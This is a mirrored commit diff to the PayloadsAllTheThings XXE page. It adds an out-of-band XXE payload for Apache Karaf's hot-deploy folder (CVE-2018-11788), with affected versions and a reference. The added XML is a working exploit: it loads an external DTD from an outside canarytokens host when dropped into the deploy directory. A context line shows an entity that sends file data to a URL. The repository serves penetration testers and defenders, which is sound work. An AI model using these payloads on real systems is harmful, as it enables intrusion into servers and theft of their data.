mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 15:14:34 +00:00
Merge pull request #56 from noraj/patch-1
add XXE OOB with Apache Karaf "hot deploy" (CVE-2018-11788)
This commit is contained in:
commit
3b70783450
1 changed files with 21 additions and 1 deletions
|
@ -192,6 +192,26 @@ File stored on http://127.0.0.1/dtd.xml
|
||||||
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">
|
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### XXE OOB with Apache Karaf "hot deploy" (CVE-2018-11788)
|
||||||
|
|
||||||
|
Affected versions:
|
||||||
|
|
||||||
|
- Apache Karaf <= 4.2.1
|
||||||
|
- Apache Karaf <= 4.1.6
|
||||||
|
|
||||||
|
```xml
|
||||||
|
<?xml version="1.0" encoding="UTF-8"?>
|
||||||
|
<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://27av6zyg33g8q8xu338uvhnsc.canarytokens.com"> %dtd;]
|
||||||
|
<features name="my-features" xmlns="http://karaf.apache.org/xmlns/features/v1.3.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
|
||||||
|
xsi:schemaLocation="http://karaf.apache.org/xmlns/features/v1.3.0 http://karaf.apache.org/xmlns/features/v1.3.0">
|
||||||
|
<feature name="deployer" version="2.0" install="auto">
|
||||||
|
</feature>
|
||||||
|
</features>
|
||||||
|
```
|
||||||
|
|
||||||
|
Send the XML file to the `deploy` folder.
|
||||||
|
|
||||||
|
Ref. [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788)
|
||||||
|
|
||||||
## XXE in exotic files
|
## XXE in exotic files
|
||||||
|
|
||||||
|
@ -244,4 +264,4 @@ GIF (experimental)
|
||||||
* [Blind OOB XXE At UBER 26+ Domains Hacked](http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html) by Raghav Bisht
|
* [Blind OOB XXE At UBER 26+ Domains Hacked](http://nerdint.blogspot.hk/2016/08/blind-oob-xxe-at-uber-26-domains-hacked.html) by Raghav Bisht
|
||||||
* [XXE through SAML](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf)
|
* [XXE through SAML](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf)
|
||||||
* [XXE in Uber to read local files](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html)
|
* [XXE in Uber to read local files](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html)
|
||||||
* [XXE by SVG in community.lithium.com](http://esoln.net/Research/2017/03/30/xxe-in-lithium-community-platform/)
|
* [XXE by SVG in community.lithium.com](http://esoln.net/Research/2017/03/30/xxe-in-lithium-community-platform/)
|
||||||
|
|
Loading…
Reference in a new issue